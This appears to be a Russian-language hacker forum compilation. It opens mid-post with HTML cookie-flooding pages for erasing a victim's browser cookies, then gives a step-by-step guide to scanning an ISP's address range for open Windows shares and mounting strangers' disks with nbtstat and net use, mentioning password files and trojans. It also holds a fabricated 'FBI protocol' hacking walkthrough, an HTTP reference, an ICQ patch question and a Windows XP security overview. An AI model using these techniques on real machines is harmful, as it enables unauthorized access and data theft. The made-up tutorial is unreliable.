взломщиками для достижения своих целей. 1. Радость от гадости. Первый пример основан на том, что по спецификациям, броузер может хранить не больше 20 записей от одного домена. При переполнении данного лимита, старые записи затираются новыми. Использование: Закачать HTML-файл на тот сервер, откуда пришли cookie. Можно послать по E-mail, если жертва читает почту через Web, все cookie от его почтового сервера сотрутся. Если нужно удалить все cookies с *.домен.com, заменять строчки примера на <META HTTP-EQUIV="Set-Cookie" CONTENT="You_are1=cacked1; EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT; path=/; domain=домен.com;"> Работает только с доменами COM, EDU, NET, ORG, GOV, MIL, INT. Сам пример файла: <html><head> <META HTTP-EQUIV="Set-Cookie" CONTENT="You_are1=cacked1; EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT;"> <META HTTP-EQUIV="Set-Cookie" CONTENT="You_are2=cacked2; EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT;"> ... <META HTTP-EQUIV="Set-Cookie" CONTENT="You_are20=cacked20; EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT;"> </head></html> Сохраняй этот файл как cook.htm, он нам еще пригодится. 2. Полная гадость. Вторая гадость основана на том, что общее количество cookies может быть не больше 300. При переполнении лимита, старые записи также затираются новыми. Уловил мысль? Затираем все cookies жертвы. Сначала тебе придется завести 15 аккаунтов для страничек на разных серверах. Заходим на всякие narod.ru, заводим аккаунты cook.site1.ru, cook.site2.ru и т.д. до cook.site15.ru. Затем заливаем на каждую страничку файл cook.htm, который мы использовали в прошлой гадости. На все это у тебя должно уйти не больше часа при нормальной раскладке пальцев \m/. Создаем файлик index.html и вписываем туда следующее: <html><head></head> <frameset rows="0,0,0,0,0,0,0,0,0,0,0,0,0,0,*"> <frame scrolling="no" noresize target="cook.site1.ru/cook.htm"> <frame scrolling="no" noresize target="cook.site2.ru/cook.htm"> ... <frame scrolling="no" noresize target="cook.site15.ru/cook.htm"> </frameset></html> Заливаем созданный файл в любое место, например на cook.narod.ru. Зайдя на этот сайт, у пользователя будет вычищаться весь cookies, накопленный годами, за пару секунд. 3. Почему нельзя забить дисковое пространство или сделать buffer overflow? Дело в том, что каждый cookie не может быть больше 4kb. Если лимит превышен, начало cookie удаляется. Максимум, что можно сделать - забить жертве 1,2mb дискового пространства при хорошем качестве связи у жертвы, либо disconnect'ить жертву при плохой связи. Для этого меняй строчки в cook.htm на следующее: <META HTTP-EQUIV="Set-Cookie" CONTENT="XAKEP1=Здесь вписывай 4kb (с вычитом 6 байт на имя XAKEP1); EXPIRES=Fri, 14-Sep-2005 13:13:13 GMT;"> Защита. Способов защиты несколько и каждый способ довольно неудобен. 1. Отменить использование cookie в броузере. Недостаток в том, что пользователь фактически отказывается ходить на огромное количество сайтов. 2. Завести программу из класса Cookie Manager. Недостаток в том, что надо постоянно держать лишнюю программу. А это для интернетчика с включенным Firewall'ом, антивирусным монитором, ICQ, Dialer'ом и т.д. довольно большое неудобство. 3. Не вступать в случайные связи. Недостаток в том, что твои "проверенные" друзья тоже могут над тобой подшутить, да и не вступать в случайные связи - значит сидеть дома и наслаждаться сайтами по адресу 127.0.0.1.
  12. Расшаренные диски или как получить доступ к удаленному компу. Данная статья описывает получение доступ к удаленному компьютеру. Многим известна фраза - "расшаренные диски". Но что это такое, зачем это нужно и как этим пользоваться, многие не знают. Я Вам вот что скажу: это понятие дает нам очень многое, а именно доступ к удаленному компьютеру, а соответственно очень много хороших вещей, таких как халявный инет, доступ к почте, красивый номер аси и многое другое. Несмотря на это мы имеем одну очень не хорошую вещь - неправомерный доступ к компьютерной информации . Но это очень вряд-ли, потому как Вы прочитаете эту статью, Вы поймете что белые и пушистые ламеры сами открывают нам доступ к компьютерной информации, находящейся у них на компе... Что же такое расшаренные диски??? Это есть ни что иное как "Шары", а именно сервисы висящие на 137, 138 и 139 портах. Эти сервисы изначально были созданы для совместного доступа к файлам и принтерам, для удобства пользователей. Но умные хакеры пользуются этой услугой по своему усмотрению)). Что нужно установить, чтобы получить доступ к расшаренным дискам. Нужно очень немного, точнее ничего: то есть практически никого софта и уж тем более железа. Все оборудование присутствует у тебя на компе а проги - в твоей ОС (речь идет о платформах Win32). Теперь приступаем к установке: заходим в Пуск => Настройки => Панель Управления => Сеть. Видите такую картинку?: ну может почти такую...Разница между этой картинкой и картинкой на вашей машине только в количестве протокол. Вот теперь-то нам и придется их пополнить. Ждем Добавить => Клиент => Microsoft => Клиент для сетей Microsoft. Далее проделываем туже операцию: Добавить => Протокол => Microsoft => NetBEUI. Семейный вход в систему ставить не обязательно. Журнал "Хакер" зачем-то советует ставить еще и Службу доступа к файлам и принтерам. На самом деле непонятно зачем??? Все прекрасно работает и без нее, а если Вы ее ставите, то становитесь такой же мешенью...с расшаренными дисками. Поясню что означают поставленные протоколы. Протокол NetBEUI (NetBIOS Extended User Interface) как раз нам и нужен чтобы доставать вот эти самые расшаренные диски. А Клиент для сетей Microsoft нужен для сканера, который будет искать эти диски на других компах. Конечно, можно сделать это вручную, перебирая каждый IP, но это нудно и бестолково. Поэтому воспользуемся сканером X-sharez от всем изветной команды Xakep. Но об этом чуть попозже...мы еще не завершили все настройки. Теперь идем в Мой компьютер => Удаленное соединение...Выбираем соединение, через которое обычно подключаемся в нэт и щелкаем правой клавишей мыши, находим закладку тип сервера и наблюдаем такую картину: Поставьте галочки именно там где стоят на картинке. Ну вот и все...закончили. Приступаем к софту. Все что нам надо это сканер расшаренных ресурсовxSHaReZ. Самую новую версию Вы можете скачать на http://www.xakep.ru/articles/releases. Как и у многих сканеров, при запуске мы сразу увидим поля для диапазона Ip-адресов. Пощупайте для начала пользователей Вашего провайдера меняя только последние числа IP-адреса. Скажем с 62.131.234.1 по 62.131.234.255 и жмен "Скан". При просмотре раздела "Логи" если Вы обнаружите такую картину: IP адрес: 62.131.234.1 Имя компа: GOSHA Имя юзера за компом: IVANOV Рабочая группа: GOSHA то у Вас есть шанс. После этого заходим в Пуск => Выполнить и набираем nbtstat.exe -A ip.ad.re.ss IP именно тот который Вам выдал сканер. После чего, окно Сеанса MS-DOS выдаст Вам такую картинку: GOSHA <00> UNIQUE GOSHA <15> UNIQUE SERVER <00> GROUP SERVER <1C> GROUP SERVER <1E> GROUP GOSHA <05> UNIQUE MAC Adress = 00-00-00-00-00-00 Это должно получится на 100%, при условии если Вы все сделали правильно. После этого нам нужно только имя GOSHA - имя компьютера. Дальше жмем Пуск => Найти => Файлы и папки Ищем файл lmhosts он изначально пустой, вписываем туда строку ip.ad.re.ss GOSHA #pre сохраняем Опять жмем Выполнить и вводим следующую строку net view \\GOSHA после чего Вы при удаче Увидите следующее окно: Share name Type ---------------------------------------- MyDisk Disk Obshiye Disk Команда выполнена успешна Могу сказать что это окно не всегда появится в таком виде...Сначала может ничего не получаться, будут выскакивать ошибки - это означает что Вы не имеете права доступа к дискам. Но не отчаевайтесь...через несколько попыток у Вас все же получится. Если получилось. Смотрим, что делать дальше... жмем Выполнить... net use x: \\GOSHA\MyDisk Если видите надпись - Команда выполнена успешна - значит все получилось. Лезим в Мой компьютер и видим там еще один дополнительный Диск X Все...теперь этот диск у Вас на компе и можете делать с его содержимым все, что Вам угодно. Только не запускайте трояна типа BackDoor, потому что он пропишется у Вас, так как диск лежит у Вас на компе. Придется троя прописывать автозагрузку автоматически. Зато есть доступ к pwl и много еще к чему другому...успехов Вам.
  13. Взлом WWW сайтов - Взлом на FBI-протоколе -------------------------------------------------------------------------------- Прежде всего вам надо найти броузер, умеющий работать с этим протоколом. Я рекомендую воспользоваться PRT-Browse'ом или Hard-Explorer. Теперь подключайтесь к интернету и заходите на fbi://search.fbi. Это поисковый сайт. Найдите там жертву. Для написания этого примера я использовал fbi://friendship.fbi. Зайдя на сайт мы ищем информацию, которая нам поможет. Нам надо: • Версия сервера (или сообщение о том, что сайт работает через центральный СРВ, такой сайт не взломать). • Какой плагин использует сайт (free, multi, robotic, ban). • На какой системе запущен сервер (если не используется центральный СРВ). • По какому запросу отдает информацию. • Где находится файл с паролями. Для получения всей этой информации надо юзать проги с fbi://hackedfbi.fbi. Заходим в раздел софт и качаем прогу serverinfo, pluginchooser, fbiping, getinfo senddata. Запускаем serverinfo и вводим адрес сайта. В ответ получаем: Server: FBIMS //версия сервера. Если 0.0, то сайт висит на центральном СРВ Posted by //имя чувака Installed //время В моем случае было: Server: FBIMS1.097alpha Posted by root Installed 18:30 15.12.2001 Теперь запускаем pluginchooser. Данная прога создано для установки плагинов. Запускаем и вводим адрес сервера, имя чувака и дату установки. Получаем установленный плагин. В моем случае плагин ban. После этого запускаем пинг и получаем ip и имя оси (у меня было freeBSD). Далее узнаем инфу о запросе. Заходим на fbi://hackedfbi.fbi и кликаем по ссылке on-line->getmethod. Вводим все данные и получаем ответ (у меня fbistandarpost). Теперь заходим в раздел эксплоиты->whereispass, а далее отвечаем на вопросы (версия, метод и др.). Качаем эксплоит и запускаем senddata. Вводим ip и путь к эксплоиту на твоем компе и заполняем инфо поля. После нажимаем послать. Сразу же запускаем getinfo вводим ip и имя запроса, нажимаем ждать. Получаем что-то вроде: GhRTHNh07.09gtTHfdr_45…login Посылаем эту строчку, только в конце вместо login указываем слово pass. Опять заходим на hackedfbi->exploitspass и теперь отправляем on-line запрос с параметром путь к файлу с паролями. Получаем логин и пароль. Заходим в раздел rootexploites и вводим полученный логин с паролем и адрес сервера (обязательно адрес сервера, а не сайта. Его мы получаем во время работы senddata). Получаем пароль рута. Дальше телнетимся к серваку с помощью проги fbitelnet (есть в пакете с senddata). Запускаем сервис banedit. Смотрим адрес сервера. У меня было fbi://freefbimssrv.fbi/. Заходим сюда с помощью броузера и видим редактор всех сайтов подключенных к этому серверу. Получается, что мы ломали не сайт, а удаленный сервер. Кстати сразу могу рассказать о сервере buysrv. Его адрес fbu://buysrv.fbi/. На нем висят более 1000 сайтов, к тому же к нему постоянно телнетится сервак netfirms.com и в момент конекта можно поиметь и его.
  14. Протокол HTTP -------------------------------------------------------------------------------- Обзор HTTP Hypertext Transfer Protocol (HTTP, протокол пересылки гипертекста) - это язык, которым клиенты и серверы World Wide Web пользуются для общения между собой. Он, по сути дела, является основой в Web. Хотя HTTP в большей степени относится к сфере программирования серверов и клиентов, знание этого протокола важно и для CGI-программирования. Кроме того, иногда HTTP фильтрует информацию и передает ее обратно пользователям - это происходит, например, когда в окне броузера отображаются коды ошибок сервера. Принципы работы HTTP Все HTTP-транзакции имеют один общий формат. Каждый запрос клиента и ответ сервера состоит из трех частей: строки запроса (ответа), раздела заголовка и тела. Клиент инициирует транзакцию следующим образом: 1. Клиент устанавливает связь с сервером по назначенному номеру порта (по умолчанию - 80). Затем клиент посылает запрос документа, указав HTTP-команду, называемую методом, адрес документа и номер версии HTTP. Например, в запросе GET /index.html HTTP/1.0 используется метод GET, которым с помощью версии 1.0 HTTP запрашивается документ index.html. Методы HTTP более подробно рассматриваются ниже. 2. Клиент посылает информацию заголовка (необязательную), чтобы сообщить серверу информацию о своей конфигурации и данные о форматах документов, которые он может принимать. Вся информация заголовка указывается построчно, при этом в каждой строке приводится имя и значение. Например, приведенный ниже заголовок, посланный клиентом, содержит его имя и номер версии, а также информацию о некоторых предпочтительных для клиента типах документов: User-Agent: Mozilla/4.05 (WinNT; 1) Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Завершается заголовок пустой строкой. 3. Послав запрос и заголовки, клиент может отправить и дополнительные данные. Эти данные используются главным образом теми CGI-программами, которые применяют метод POST. Клиенты (например, Netscape Navigator-Gold), также могут использовать их для помещения отредактированной страницы обратно на Web-сервер. Сервер отвечает на запрос клиента следующим образом: 1. Первая часть ответа сервера - строка состояния, содержащая три поля: версию HTTP, код состояния и описание. Поле версии содержит номер версии HTTP, которой данный сервер пользуется для передачи ответа. Код состояния - это трехразрядное число, обозначающее результат обработки сервером запроса клиента. Описание, следующее за кодом состояния, представляет собой просто понятный для человека текст, поясняющий код состояния. Например, строка состояния НТТР/1.0 200 OK говорит о том, что сервер для ответа использует версию HTTP 1.0. Код состояния 200 означает, что запрос клиента был успешным и затребованные данные будут переданы после заголовков. 2. После строки состояния сервер передает клиенту информацию заголовка, содержащую данные о самом сервере и затребованном документе. Ниже приведен пример заголовка: Date: Fri, 10 Jan 1998 08:17:58 GMT Server: Apache/1.2.6 Last-modified: Mon, 12 Jun 1997 21:53:08 GMT Content-type: text/html Content-length: 2482 Завершает заголовок пустая строка. 3. Если запрос клиента успешен, то посылаются затребованные данные. Это может быть копия файла или результат выполнения CGI-программы. Если запрос клиента удовлетворить нельзя, передаются дополнительные данные в виде понятного для пользователя разъяснения причин, по которым сервер не смог выполнить данный запрос. В HTTP 1.0 за передачей сервером затребованных данных следует разъединение с клиентом, и транзакция считается завершенной, если не передан заголовок Connection: Keep Alive. В HTTP 1.1 сервер по умолчанию не разрывает соединение и клиент может посылать другие запросы. Поскольку во многие документы встроены другие документы - изображения, кадры, апплеты и т.д., это позволяет сэкономить время и затраты клиента, которому в противном случае пришлось бы для получения всего одной страницы многократно соединяться с одним и тем же сервером. Таким образом, в HTTP 1.1 транзакция может циклически повторяться, пока клиент или сервер не закроет соединение явно. HTTP не сохраняет информацию по транзакциям, поэтому в следующей транзакции приходится начинать все заново. Преимущество состоит в том, что HTTP сервер может обслужить в заданный промежуток времени гораздо больше клиентов, ибо устраняются дополнительные расходы на отслеживание сеансов от одного соединения к другому. Есть и недостаток: для сохранения информации по транзакциям более сложные CGI-программы должны пользоваться скрытыми полями ввода или внешними средствами, например "ключиками" (cookies) Netscape. Запросы клиента Запросы клиента разбиваются на три раздела. Первая строка сообщения всегда содержит HTTP-команду, называемую методом, URI, который обозначает запрашиваемый клиентом файл или ресурс, и номер версии HTTP. Следующие строки запроса клиента содержат информацию заголовка. Информация заголовка содержит сведения о клиенте и информационном объекте, который он посылает серверу. Третья часть клиентского запроса представляет собой тело содержимого - собственно данные, посылаемые серверу. URI (Uniform Resource Identifier, универсальный идентификатор ресурса) - это общий термин для всех допустимых форматов схем адресации, поддерживаемых в World Wide Web. Сейчас общепринятой является схема адресации с использованием универсальных локаторов ресурсов (URL). Методы Метод - это HTTP-команда, с которой начинается первая строка запроса клиента. Метод сообщает серверу о цели запроса. Для HTTP определены три основных метода: GET, HEAD и POST. Определены и другие методы, но они не так широко поддерживаются серверами, как три перечисленных (хотя эти другие методы в будущем будут использоваться более часто). При задании имен методов учитывается регистр, поэтому GET и get различаются. Метод GET GET - это запрос информации, расположенной на сервере по указанному URL. GET - наиболее распространенный метод поиска с помощью броузеров документов для визуализации. Результат запроса GET может представлять собой, например, файл, доступный для сервера, результат выполнения программы или CGI-сценария, выходную информацию аппаратного устройства и т.д. Если клиент пользуется в своем запросе методом GET, сервер отвечает строкой состояния, заголовками и затребованными данными. Если сервер не может обработать запрос вследствие ошибки или отсутствия полномочий, он, как правило, посылает в информационном разделе ответа текстовое пояснение. Тело информационного содержимого запроса GET всегда пустое. GET в переводе на человеческий язык означает примерно следующее: "Дайте мне этот файл". Для идентификации указанных в запросе клиента файла или программы обычно используется полное имя этого объекта на сервере. Ниже приведен пример успешного запроса GET на получение файла. Клиент посылает запрос: GET /index.html HTTP/1.О Connection: Keep-Alive User-Agent: Mozilla/4.05 (WinNT; 1) Host: www.ora.com Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Сервер отвечает: HTTP/1.0 200 Document follows Date: Fri, 20 Jan 1998 08:17:58 GMT Server: Apache/1.2.6 Last-modified: Mon, 20 Jun 1997 21:53:08 GMT Content-type: text/html Content-length: 2482 (далее следует тело документа) Метод GET используется также для передачи входной информации в CGI-про- граммы посредством тегов форм. Поскольку тело запроса GET пусто, входные данные присоединяются к URL в строке GET запроса. Если в теге <form> задано значение атрибута method="GET", то пары ключ-значение, представляющие собой введенные данные из формы, присоединяются к URL после вопросительного знака. Пары отделяются друг от друга амперсандом (&). Например, по запросу GET /cgi-bin/birthday.pl?month=august&date=24 HTTP/1.О сервер передаст в CGI-программу birthday.pl значения month и date, указанные в форме, созданной на клиенте. Входные данные в конце URL кодируются в спецификации CGI. Чтобы специальные символы интерпретировались обычным образом, используются их шестнадцатиричные коды. Аналогичным образом в методе GET может передаваться информация о дополнительных путях. При этом дополнительный путь указывается после URL, т.е. /cgi-bin/display.pl/cgi/cgi_doc.txt. Сервер определяет, где заканчивается имя программы (display.pl). Все данные, которые следуют за именем программы, интерпретируются как дополнительный путь. Метод HEAD Метод HEAD аналогичен методу GET, за исключением того, что сервер ничего не посылает в информационной части ответа. Метод HEAD запрашивает только информацию заголовка о файле или ресурсе. Информация заголовка запроса HEAD должна быть такой же, как в запросе GET. Этот метод используется, когда клиент хочет найти информацию о документе, не получая его. Для метода HEAD существует множество приложений. Например, клиент может затребовать следующую информацию: время изменения документа (эти данные полезны для запросов, связанных с кэш-памятью); размер документа (необходим для компоновки страницы, оценки времени передачи, определения необходимости запроса более компактной версии документа); тип документа (позволяет клиенту изучать документы только определенного типа); тип сервера (позволяет создавать специализированные запросы). Следует отметить, что большая часть информации заголовка, которую посылает сервер, не является обязательной и может предоставляться не всеми серверами. Рекомендуемый вариант для Web-клиентов - учитывать гибкость ответов сервера и предусматривать определенные меры по умолчанию, если сервер не передал необходимую информацию заголовка. Ниже приведен пример HTTP-транзакции с использованием запроса HEAD. Клиент посылает запрос: HEAD /index.html HTTP/1.0 Connection: Close User-Agent: Mozilla/4.05 (WinNT; 1) Host: www.ora.com Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Сервер отвечает: HTTP/1.0 200 Document follows Date: Fri, 20 Jan 1998 08:17:58 GMT Server: Apache/1.2.6 Last-modified: Mon, 17 Jun 1996 21:53:08 GMT Content-type: text/html Content-length: 2482 (Тело содержимого в ответе на запрос HEAD не передается.) Метод POST Метод POST позволяет посылать на сервер данные в запросе клиента. Эти данные направляются в программу обработки данных, к которой сервер имеет доступ (например, в CGI-сценарий). Метод POST может использоваться во многих приложениях. Например, его можно применять для передачи входных данных для: сетевых служб (таких как телеконференции); программ с интерфейсом в виде командной строки; аннотирования документов на сервере; выполнения операций в базах данных. Данные, посылаемые на сервер, находятся в теле содержимого запроса клиента. По завершении обработки запроса POST и заголовков сервер передает тело содержимого в программу, заданную URL. В качестве схемы кодирования с методом POST используется URL-кодирование, которое позволяет преобразовывать данные форм в список переменных и значений для CGI-обработки. Ниже приведен небольшой пример запроса клиента с использованием метода POST. Клиент посылает на сервер данные о дне рождения, введенные в форму: POST /cgi-bin/birthday.pl HTTP/1.0 User-Agent; Mozilla/4.05 (WinNT; 1) Accept: image/gif, iinage/x-xbj.tmap, image/jpeg, J.mage/pjpeg, */* Host: www.ora.com Content-type: application/x-www-form-ur.lencoded Content-Length: 20 nionth=august&date=24 Другие методы Приведенные ниже методы также определены, хотя и используются не столь часто: LINK Связывает информацию заголовка с документом на сервере. UNLINK Отменяет связь информации заголовка с документом на сервере. PUT Помещает тело содержимого запроса по указанному URI. DELETE Удаляет данные, находящиеся на сервере по заданному URI. OPTIONS Запрашивает информацию о коммуникационных параметрах сервера. Чтобы запросить данные обо всем сервере в целом, вместо URI запроса следует использовать символ *. TRACE Требует, чтобы тело содержимого запроса было возвращено без изменений. Используется для отладки. Ответы сервера Ответ сервера на запрос клиента состоит из трех частей. Первая строка - это строка ответа сервера, которая содержит номер версии HTTP, число, обозначающее состояние запроса, и краткое описание состояния. После строки ответа следует информация заголовка и тело содержимого, если таковое имеется. -------------------------------------------------------------------------------- Коды ответов HTTP сервера В первой строке ответа HTTP-сервера содержится информация о том, был запрос клиента успешным или нет, а также данные о причинах успешного либо неуспешного завершения запроса. Эта информация обозначается трехразрядным кодом ответа сервера (иногда его называют кодом состояния) и сопровождается описательным сообщением. Коды состояний обычно генерируются Web-серверами, но иногда это могут делать и CGI-сценарии, CGI-сценарии генерируют собственные заголовки вместо тех, которые должен выдавать сервер. Коды состояний группируются следующим образом: Диапазон кодов Значение ответа 100-199 Информационный 200-299 Запрос клиента успешен 300-399 Запрос клиента переадресован, необходимы дальнейшие действия 400-499 Запрос клиента является неполным 500-599 Ошибки сервера В HTTP в каждом диапазоне определены лишь несколько кодов, хотя для сервера при необходимости могут определяться собственные коды. Клиент при получении кода, который он не может распознать, интерпретирует его в соответствии с диапазоном, к которому этот код принадлежит. Коды в диапазонах 100-199, 200-299 и 300-399 большинство Web-броузеров обрабатывают без извещения пользователя, а некоторые коды ошибок из диапазонов 400-499 и 500-599 отображаются для пользователя (например, 404 Not Found). Информационные ответы Ответы в диапазоне 100-199 - информационные; они показывают, что запрос клиента принят и обрабатывается. 100 Continue Начальная часть запроса принята, и клиент может продолжать передачу запроса. 101 Switching Protocols Сервер выполняет требование клиента и переключает протоколы в соответствии с указанием, данным в поле заголовка Upgrade. Успешные запросы клиента Ответы в диапазоне 200-299 означают, что запрос клиента обработан успешно. 200 OK Запрос клиента обработан успешно, и ответ сервера содержит затребованные данные. 201 Created Этот код состояния используется в случае создания нового URI. Вместе с этим кодом результата сервер выдает заголовок Location (см. главу 19), который содержит информацию о том, куда были помещены новые данные. 202 Accepted Запрос принят, но обрабатывается не сразу. В теле содержимого ответа сервера может быть дана дополнительная информация о данной транзакции. Гарантии того, что сервер в конечном итоге удовлетворит запрос, нет, даже несмотря на то, что на момент приема запрос выглядел допустимым. 203 Non-Authoritative Information Информация в заголовке содержимого взята из локальной копии или у третьей стороны, а не с исходного сервера. 204 No Content Ответ содержит код состояния и заголовок, но тело содержимого отсутствует. При получении этого ответа броузер не должен обновлять свой документ. Обработчик чувствительных областей изображений может возвращать этот код, когда пользователь щелкает на бесполезных или пустых участках изображения. 205 Reset Content Броузер должен очистить форму, используемую в данной транзакции, для дополнительных входных данных. Полезен для CGI-приложений, требующих ввода данных. 206 Partial Content Сервер возвращает лишь часть данных затребованного объема. Используется в ответе на запрос с указанием заголовка Range. Сервер должен указать диапазон, включенный в ответ, в заголовке Content-Range. Переадресация Код ответа в диапазоне 300-399 означает, что запрос не выполнен и клиенту нужно предпринять некоторые действия для удовлетворения запроса. 300 Multiple Choices Затребованный URI обозначает более одного ресурса. Например, URI может обозначать документ, переведенный на несколько языков. В теле содержимого, возвращенном сервером, может находиться перечень более конкретных данных о том, как выбрать ресурс правильно. 301 Moved Permanently Затребованный URI уже не используется сервером, и указанная в запросе операция не выполнена. Новое местонахождение затребованного документа указывается в заголовке Location. Во всех последующих запросах данного документа следует указывать новый URI. 302 Moved Temporarily Затребованный URI перемешен, но лишь временно. Заголовок Location указывает на новое местонахождение. Сразу же после получения этого кода состояния клиент должен разрешить запрос при помощи нового URI, но во всех последующих запросах необходимо пользоваться старым URI. 303 See Other Затребованный URI можно найти по другому URI (указанному в заголовке Location). Его следует выбрать методом GET по данному ресурсу. 304 Not Modified Это код ответа на заголовок lf-Modified-Since, если URI не изменялся с указанной даты. Тело содержимого не посылается, и клиент должен использовать свою локальную копию. 305 Use Proxy Доступ к затребованному URI должен осуществляться через proxy-сервер, указанный в заголовке Location. Неполные запросы клиента Коды ответов в диапазоне 400-499 означают, что запрос клиента неполный. Эти коды могут также означать, что от клиента требуется дополнительная информация. 400 Bad Request Означает, что сервер обнаружил в запросе клиента синтаксическую ошибку. 401 Unauthorized Этот код результата, передаваемый с заголовком WWW-Authenticate, показывает, что пославший запрос пользователь не имеет необходимых полномочий и что при повторении запроса с указанием данного URI пользователь должен такие полномочия предоставить. 402 Payment Required Этот код в HTTP еще не реализован. 403 Forbidden Запрос отклонен по той причине, что сервер не хочет (или не имеет возможности) ответить клиенту. 404 Not Found Документ по указанному URI не существует. 405 Method Not Allowed Этот код выдается с заголовком Allow и показывает, что метод, используемый клиентом, для данного URI не поддерживается. 406 Not Acceptable Ресурс, указанный клиентом по данному URI, существует, но не в том формате, который нужен клиенту. Вместе с этим кодом сервер выдает заголовки Content-Language, Content-Encoding и Content-Type. 407 Proxy Authentication Required Proxy-сервер должен санкционировать запрос перед тем, как пересылать его. Используется с заголовком Proxy-Authenticate. 408 Request Time-out Этот код ответа означает, что клиент не передал полный запрос в течение некоторого установленного промежутка времени (который обычно задается в конфигурации сервера) и сервер разрывает сетевое соединение. 409 Conflict Данный запрос конфликтует с другим запросом или с конфигурацией сервера. Информацию о конфликте следует возвратить в информационной части ответа. 410 Gone Данный код показывает, что затребованный URI больше не существует и навсегда удален с сервера. 411 Length Required Сервер не примет запрос без указанного в нем заголовка Content-Length. 412 Precondition Failed Результат вычисления условия, заданного в запросе одним или несколькими заголовками if. . ., представляет собой "ложь". 413 Request Entity Too Large Сервер не будет обрабатывать запрос, потому что его тело слишком велико. 414 Request-URI Too Long Сервер не будет обрабатывать запрос, потому что его URI слишком длинный. 415 Unsupported Media Type Сервер не будет обрабатывать запрос, потому что его тело имеет неподдерживаемый формат. Ошибки сервера Коды ответов в диапазоне 500-599 показывают, что сервер столкнулся с ошибкой и, вероятно, не сможет выполнить запрос клиента. 500 Internal Server Error При обработке запроса на сервере один из его компонентов (например, CGI-программа) выдал аварийный отказ или столкнулся с ошибкой конфигурации. 501 Not Implemented Клиент запросил выполнение действия, которое сервер выполнить не может. 502 Bad Gateway Сервер (или proxy-сервер) получил недопустимые ответы другого сервера (или proxy-сервера). 503 Service Unavailable Данный код означает, что данная служба временно недоступна, но в будущем доступ к ней будет восстановлен. Если сервер знает, когда это произойдет, может быть также выдан заголовок Retry-After. 504 Gateway Time-out Этот ответ похож на 408 (Request Time-out) , за исключением того, что шлюз или уполномоченный сервер превысил лимит времени. 505 HTTP Version not supported Сервер не поддерживает версию протокола HTTP, использованную в запросе. Этот текст был взят из книги Stephen Spainhour и Valerie Quercia "Webmaster in a nutshell".
  15. kto v kyrse naschet etoi progi i znaet kakaja ee versija rabotaet pod XP podskajite gde skachat, izril ves inet
  16. mojet kto yge propachil novyu versiu ICQ na predmet reklam i IPclienta esli da to podskajite kakoi bit patchili v staroi versii ja patchil ICQifDlg 0x09330: FF8D 4DE0 8945 E8FF D638 5DF2 5E74 3C8B 0x09340: 45E8 3BC3 7435 8BC8 C1E9 1851 33C9 8A4D menjl na 0x09330: FF8D 4DE0 8945 E8FF D638 5DF2 5E90 908B 0x09340: 45E8 3BC3 9090 8BC8 C1E9 1851 33C9 8A4D popravde govorja ja skochal kakoito Hex editor, i nikak v nem nerazberys, blin, chto to on netak vse pokazivaet, a starii normalnii ja ster pary mesjacev nazad, vot teper i mychaus ( koroche esli kto vrybilsja chto tyt napisanoo to ja dymau tot i smojet otvetit, prosba : chainiki kotorie nevrybilis prosba nepisat vsjakie glyposti v topike
  17. Безопасность в Windows XP -------------------------------------------------------------------------------- Стратегия безопасности Windows XP Модель безопасности Windows XP Professional основана на понятиях аутентификации и авторизации. При аутентификации проверяются идентификационные данные пользователя, а при авторизации - наличие у него прав доступа к ресурсам компьютера или сети. В Windows XP Professional также имеются технологии шифрования, которые защищают конфиденциальные данные на диске и в сетях: например, EFS (Encrypting File System), технология открытого ключа. Аутентификация Регистрируясь на компьютере для получения доступа к ресурсам локального компьютера или сети, пользователь должен ввести свое имя и пароль. В Windows XP Professional возможна единая регистрация для доступа ко всем сетевым ресурсам. Таким образом, пользователь может войти в систему с клиентского компьютера по единому паролю или смарт-карте и получить доступ к другим компьютерам домена без повторного ввода идентификационных данных. Главный протокол безопасности в доменах Windows 2000 - Kerberos версии 5. Для аутентификации на серверах под управлением Windows NT 4.0 и доступа к ресурсам доменов Windows NT клиенты Windows XP Professional используют протокол NTLM. Компьютеры с Windows XP Professional, не принадлежащие к домену, также применяют для аутентификации протокол NTLM. Используя Windows XP Professional в сети с активным каталогом (Active Directory), можно управлять безопасностью регистрации с помощью параметров политики групп, например, ограничивать доступ к компьютерам и принудительно завершать сеансы работы пользователей спустя заданное время. Можно применять предварительно сконфигурированные шаблоны безопасности, соответствующие требованиям к безопасности данной рабочей станции или сети. Шаблоны представляют собой файлы с предварительно сконфигурированными параметрами безопасности, которые можно применять на локальном компьютере или импортировать в групповые политики активного каталога. Эти шаблоны используются в неизменном виде или настраиваются для определенных нужд. Авторизация Авторизация позволяет контролировать доступ пользователей к ресурсам. Применение списков управления доступом (access control list, ACL) и прав доступа NTFS гарантирует, что пользователь получит доступ только к нужным ему ресурсам, например, к файлам, дискам (в том числе сетевым), принтерам и приложениям. С помощью групп безопасности, прав пользователей и прав доступа можно одновременно управлять безопасностью как на уровне ресурсов, так и на уровне файлов, папок и прав отдельных пользователей. Группы безопасности Группы безопасности упрощают управление доступом к ресурсам. Можно приписывать пользователей к группам безопасности, а затем предоставлять этим группам права доступа. Можно добавлять пользователей к группам безопасности и удалять их оттуда в соответствии с потребностями этих пользователей. Оснастка MMC Computer Management позволяет создавать учетные записи пользователей и помещать их в локальные группы безопасности. Можно предоставлять пользователям права доступа к файлам и папкам и определять действия, которые пользователи могут выполнять над ними. Можно разрешить и наследование прав доступа. При этом права доступа, определенные для каталога, применяются ко всем его подкаталогам и находящимся в них файлам. Среди групп безопасности, локальных для домена и компьютера, имеется ряд предварительно сконфигурированных групп, в которые можно включать пользователей. Администраторы (Administrators) обладают полным контролем над локальным компьютером и правами на совершение любых действий. При установке Windows XP Professional для этой группы создается и назначается встроенная учетная запись Администратор (Administrator). Когда компьютер присоединяется к домену, по умолчанию к группе Администраторы добавляется группа Администраторы домена (Domain Administrators). Опытные пользователи (Power Users) обладают правами на чтение и запись файлов не только в личных папках, но и за их пределами. Они могут устанавливать приложения и выполнять многие административные действия. У членов этой группы такой же уровень прав доступа, что и у групп Пользователи (Users) и Опытные пользователи (Power Users) в Windows NT 4.0. Пользователи (Users) в отношении большей части системы имеют только право на чтение. У них есть право на чтение и запись только файлов их личных папок. Пользователи не могут читать данные других пользователей (если они не находятся в общей папке), устанавливать приложения, требующие модификации системных каталогов или реестра, и выполнять административные действия. Права пользователей в Windows XP Professional более ограниченны по 